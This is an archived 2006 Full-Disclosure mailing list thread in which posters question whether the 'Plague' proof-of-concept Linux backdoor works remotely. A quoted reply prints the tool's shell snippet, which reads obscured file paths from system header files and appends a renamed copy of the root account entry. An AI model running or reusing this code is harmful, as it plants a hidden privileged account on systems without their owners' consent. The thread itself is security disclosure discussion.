[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
- To: "Dude VanWinkle" <dudevanwinkle@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
- From: hijacker@xxxxxxxxx
- Date: Sun, 22 Oct 2006 14:29:35 +0300 (EEST)
even if they have ssh access, there is still nothing they can do, except
to create two files in there $HOME directories containing expressions from
paths.h and sysexits.h ?
Why would that be considered a backdoor?
Regards,
-Nikolay Kichukov
> On 10/22/06, J. Oquendo <sil@xxxxxxxxxxxxxxx> wrote:
>>
>> Plague is an odd proof of concept backdoor keeping
>> tool based on the premise of using existing system
>> files and commands to keep and maintain a backdoor
>> on Linux systems. I could have modified this for
>> BSD, Solaris, etc., but I didn't feel like doing
>> the work...
>>
>> http://www.infiltrated.net/plague
>>
>
> (from the link)
>
> if [ -e /usr/include/paths.h ]
>
> then
>
> file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
> sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
> file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
> sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2
>
> fi
>
> --------------------------------
>
> So this backdoor wouldnt work remotely, correct? You would need to add
> the user to the people allowed to ssh in, and poke a hole for ssh in
> the firewall./?
>
> -JP
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/